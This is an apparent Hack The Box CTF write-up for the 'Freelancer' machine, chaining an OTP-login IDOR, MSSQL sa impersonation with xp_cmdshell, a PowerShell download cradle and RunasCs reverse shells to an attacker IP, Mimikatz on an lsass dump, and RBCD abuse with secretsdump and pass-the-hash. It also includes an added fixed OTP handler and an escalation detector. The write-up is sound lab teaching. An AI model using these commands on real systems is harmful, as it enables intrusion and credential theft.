
HTB: Freelancer


HTB Freelancer machine card
Freelancer starts with gaining access as an employer, then escalating to admin via an IDOR vulnerability in the QR-Code OTP login flow. From there, a SQL terminal exposes MSSQL commands allowing impersonation of sa and enabling xp_cmdshell for a reverse shell. After pivoting through users via credential files and a memory dump, the path to Domain Admin goes through Resource-Based Constrained Delegation (RBCD).
Attack path: registration → Employer → Admin (IDOR) → sql_svc (MSSQL) → mikasaAckerman → lorra199 → SYSTEM (RBCD)

Reconnaissance

Nmap

Full port scan reveals a Windows domain controller. Notable: MSSQL on port 55297 and WinRM on 5985.

nmap
(SP1R4@kali)-[~]
└$ nmap -sC -sV -p- -oN nmap_results.txt 10.129.159.108

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
55297/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00
| DNS_Domain_Name: freelancer.htb
| DNS_Computer_Name: DC.freelancer.htb
Service Info: Host: DC; OS: Windows

RPC & SMB — Access Denied

rpcclient / smbclient
(SP1R4@kali)-[~]
└$ rpcclient -U "" -N 10.10.11.5
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

(SP1R4@kali)-[~]
└$ smbclient -L 10.10.11.5
Anonymous login successful
Unable to connect with SMB1 -- no workgroup available

Website — TCP 80

The site is a job board platform with Freelancer and Employer registration.

Freelancer website homepage

Register as a freelancer first. Enumerating the site as a freelancer turns up nothing useful.

Freelancer profile dashboard — howdy namiq

Register as an employer next — but login fails immediately after registration:

Employer account not activated error

Account recovery bypass

Use the Account Recovery form. The security questions accept trivially guessable answers (all set to the same value during registration). This reactivates the account and allows a password reset:

Account recovery form — bob/bob/bob/bob

Now inside as employer bob:

Employer dashboard — Howdy bob

IDOR — Insecure Direct Object Reference

QR-Code section

The QR-Code menu item generates an OTP login URL. Scanning it reveals that one path segment of the URL is the current user's numeric ID, base64-encoded:

QR-Code page in employer dashboard OTP URL with base64 user ID visible
OTP URL format: http://freelancer.htb/accounts/login/otp/<base64_uid>/<token>
Replacing the base64 value with any other user's encoded ID logs in as that user — classic IDOR.

Escalating to admin

Browse blog comments to find the admin username. Profile URL enumeration confirms admin has ID 2. Encode it with echo -n "2" | base64, which gives Mg==.

IDOR payload
# bob (ID 10011)
http://freelancer.htb/accounts/login/otp/MTAwMTE=/e4ff26...

# admin (ID 2)
http://freelancer.htb/accounts/login/otp/Mgo=/e4ff26...
Logged in as admin — Howdy admin
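The root cause of the IDOR above, as an added example that is not part of the original post or of the Freelancer application's code: a minimal OTP-login handler in its vulnerable form (the token is checked, but the account is chosen by the user ID in the URL) next to a hardened form that binds each token to the user it was issued for. The user table, IDs and token store are constructed for the demo.

```python
import base64
import secrets
from typing import Optional, Tuple

# Constructed user table standing in for the application's database (assumption).
USERS = {2: "admin", 10011: "bob"}

def encode_uid(uid: int) -> str:
    return base64.b64encode(str(uid).encode()).decode()

def decode_uid(b64_uid: str) -> int:
    # int() ignores surrounding whitespace, so "Mgo=" ("2\n") decodes like "Mg==" ("2").
    return int(base64.b64decode(b64_uid).decode())

# Vulnerable flow: the token only proves that *some* QR login was requested; the
# server never records whom it was issued to and trusts the user id in the URL.
_valid_tokens = set()

def issue_otp_vulnerable(uid: int) -> Tuple[str, str]:
    token = secrets.token_hex(16)
    _valid_tokens.add(token)
    return encode_uid(uid), token

def login_otp_vulnerable(b64_uid: str, token: str) -> Optional[str]:
    if token not in _valid_tokens:
        return None
    return USERS.get(decode_uid(b64_uid))  # client-controlled id picks the account

# Hardened flow: each token is bound server-side to the issuing user and consumed on
# first use, so swapping the base64 id no longer matches the token's owner.
_token_owner = {}

def issue_otp_fixed(uid: int) -> Tuple[str, str]:
    token = secrets.token_hex(16)
    _token_owner[token] = uid
    return encode_uid(uid), token

def login_otp_fixed(b64_uid: str, token: str) -> Optional[str]:
    owner = _token_owner.pop(token, None)  # single use, even when the attempt fails
    if owner is None or owner != decode_uid(b64_uid):
        return None
    return USERS.get(owner)
```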

/admin — SQL Terminal

The admin panel exposes a SQL Terminal under Development Tools:

Admin dashboard with SQL Terminal in Development Tools

Current user

SELECT user_name(); -- Result: Freelancer_webapp_user
SQL terminal showing Freelancer_webapp_user result

Capturing NTLM hash via xp_dirtree

xp_dirtree '\\10.10.14.16\zip'
Responder output capturing NTLM hash from sql_svc
The hash does not crack. Pivot to SQL privilege escalation instead.

sa impersonation → sysadmin → xp_cmdshell

Check if sa can be impersonated and if it holds sysadmin rights, then grant them to our user:

-- Verify sa is sysadmin
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')   -- returns 1

-- Grant sysadmin to webapp user
EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', '1'; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE;

Initial xp_cmdshell permission denied error
IS_SRVROLEMEMBER returning 1 — sysadmin confirmed
xp_cmdshell whoami showing freelancer\sql_svc
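A defender's counterpart to the chain above, added here and not part of the original post: detection logic that groups T-SQL statements by session and flags a session that impersonates sa and then grants sysadmin, enables xp_cmdshell or runs it (the xp_dirtree UNC-path step from the previous section is tagged as well). The event tuples and their format are constructed for the demo, not real SQL Server audit output.

```python
import re
from collections import defaultdict

# One regex per step of the escalation chain (T-SQL keywords are case-insensitive).
STEPS = [
    ("impersonate_sa", re.compile(r"EXECUTE\s+AS\s+LOGIN\s*=\s*'sa'", re.I)),
    ("grant_sysadmin", re.compile(
        r"sp_addsrvrolemember\b.*'sysadmin'|ALTER\s+SERVER\s+ROLE\s+sysadmin\s+ADD", re.I)),
    ("enable_xp_cmdshell", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*'?1\b", re.I)),
    ("run_xp_cmdshell", re.compile(r"\bxp_cmdshell\s+'", re.I)),
    ("unc_xp_dirtree", re.compile(r"\bxp_dirtree\s+'\\\\", re.I)),
]
ESCALATION = {"grant_sysadmin", "enable_xp_cmdshell", "run_xp_cmdshell"}

def classify(statement):
    """Return the chain steps a single statement matches."""
    return [name for name, rx in STEPS if rx.search(statement)]

def detect_escalation(events):
    """events: iterable of (session_id, login_name, statement) tuples.
    Returns {session_id: (login_name, sorted steps)} for sessions that impersonate sa
    and then take at least one escalation action in the same session."""
    seen = defaultdict(set)
    logins = {}
    for session, login, stmt in events:
        logins[session] = login
        seen[session].update(classify(stmt))
    return {s: (logins[s], sorted(steps)) for s, steps in seen.items()
            if "impersonate_sa" in steps and steps & ESCALATION}

# Constructed sample modelled on the statements in this writeup; not real audit output.
SAMPLE_EVENTS = [
    (51, "Freelancer_webapp_user", "SELECT user_name();"),
    (51, "Freelancer_webapp_user", r"xp_dirtree '\\10.10.14.16\zip'"),
    (51, "Freelancer_webapp_user", "EXECUTE AS LOGIN = 'sa'"),
    (51, "Freelancer_webapp_user", "SELECT IS_SRVROLEMEMBER('sysadmin')"),
    (51, "Freelancer_webapp_user", "EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'"),
    (51, "Freelancer_webapp_user", "EXEC sp_configure 'show advanced options', '1'; RECONFIGURE;"),
    (51, "Freelancer_webapp_user", "EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE;"),
    (51, "Freelancer_webapp_user", "EXEC xp_cmdshell 'whoami'"),
    (52, "reporting_user", "SELECT TOP 10 * FROM jobs"),
    (53, "dba", "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER('sysadmin')"),
]

if __name__ == "__main__":
    for session, (login, steps) in detect_escalation(SAMPLE_EVENTS).items():
        print(f"session {session} ({login}): {', '.join(steps)}")
```

Session 53 impersonates sa but only reads role membership, so it is not flagged; a real deployment would feed this from SQL Server Audit or Extended Events rather than a hard-coded list.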

Reverse shell

Direct shells are blocked by AV. Use a PowerShell download-cradle:

EXEC xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.16/shell.ps1)"'
nc listener
(SP1R4@kali)-[~]
└$ rlwrap nc -lvnp 4444
connect to [10.10.14.16] from (UNKNOWN) [10.129.159.108] 65419
SHELL>
Shell obtained as freelancer\sql_svc.

Lateral Movement — sql_svc → mikasaAckerman

Plaintext creds in SQL config

sql-Configuration.INI
SHELL> type C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SAPWD="t3mp0r@ryS@PWD"
crackmapexec — password spray
(SP1R4@kali)-[~]
└$ crackmapexec smb 10.129.171.125 -u users.txt -p IL0v3ErenY3ager
SMB  DC  [-] freelancer.htb\sql_svc
SMB  DC  [-] freelancer.htb\Administrator
SMB  DC  [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
RunasCs — pivot to mikasaAckerman
SHELL> certutil -split -f -urlcache http://10.10.14.16/RunasCs.exe
SHELL> .\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.16:9001

(SP1R4@kali)-[~]
└$ rlwrap nc -lvnp 9001
C:\WINDOWS\system32> whoami
freelancer\mikasaackerman

Lateral Movement — mikasaAckerman → lorra199

mail.txt
PS C:\Users\mikasaAckerman\Desktop> type mail.txt
Hello Mikasa,
Liza has requested me to generate a full memory dump on the DC. The file is on the Desktop.

A memory dump (MEMORY.7z) is on the Desktop. Extract it, isolate the lsass.exe process memory, and run Mimikatz against it to recover lorra199's password from the SAM:

evil-winrm — lorra199
(SP1R4@kali)-[~]
└$ evil-winrm -i 10.129.171.125 -u lorra199 -p 'PWN3D#l0rr@Armessa'
*Evil-WinRM* PS C:\Users\lorra199\Documents>
Shell obtained as lorra199.

Bloodhound Enumeration

bloodhound-python
(SP1R4@kali)-[~]
└$ bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa' -d freelancer.htb -ns 10.129.171.125

lorra199 is a member of AD Recycle Bin:

Bloodhound: lorra199 MemberOf AD Recycle Bin

AD Recycle Bin has GenericWrite on the Domain Controller DC$:

GenericWrite on DC$ enables RBCD abuse: with it we can set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the DC's computer object and then impersonate any user to it, including Administrator.

Privilege Escalation — RBCD → Domain Admin

RBCD full chain
# 1. Add fake computer account
(SP1R4@kali)-[~]
└$ impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-ip 10.129.171.125 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa'
[*] Successfully added machine account ATTACKERSYSTEM$

# 2. Write delegation attribute
(SP1R4@kali)-[~]
└$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa'
[*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy

# 3. Sync clock + get service ticket
(SP1R4@kali)-[~]
└$ systemctl stop systemd-timesyncd && ntpdate -u 10.129.171.125
(SP1R4@kali)-[~]
└$ impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.129.171.125 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!'
[*] Saving ticket in Administrator.ccache

# 4. Dump domain credentials
(SP1R4@kali)-[~]
└$ export KRB5CCNAME=Administrator.ccache
(SP1R4@kali)-[~]
└$ impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e827463344...

# 5. Pass-the-Hash
(SP1R4@kali)-[~]
└$ evil-winrm -i 10.129.171.125 -u Administrator -H 0039318f1e827463344...
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
d5be56ad************************
🚩 Root flag captured. Domain compromised.

Summary

Stage             Technique                                            Tool
Foothold          Employer account recovery via trivial security Q&A   Browser
Admin access      IDOR via base64 user ID in OTP URL                   Browser
Shell             MSSQL sa impersonation → xp_cmdshell → PS cradle     SQL Terminal, nc
Lateral (mikasa)  Plaintext creds in SQL config INI + RunasCs          crackmapexec
Lateral (lorra)   Memory dump → Mimikatz → lsass → SAM                  Mimikatz
Domain Admin      RBCD abuse via GenericWrite on DC$                   impacket suite

Key commands

quick reference
# MSSQL privilege escalation
EXECUTE AS LOGIN = 'sa';
EXEC sp_addsrvrolemember 'user', 'sysadmin'
EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE

# RBCD chain
impacket-addcomputer      # add fake machine account
impacket-rbcd             # write delegation attribute on DC$
ntpdate -u <DC_IP>        # sync clock (avoid KRB_AP_ERR_SKEW)
impacket-getST            # get Administrator service ticket
impacket-secretsdump      # dump NTDS via DRSUAPI
evil-winrm -H <hash>      # pass-the-hash as Administrator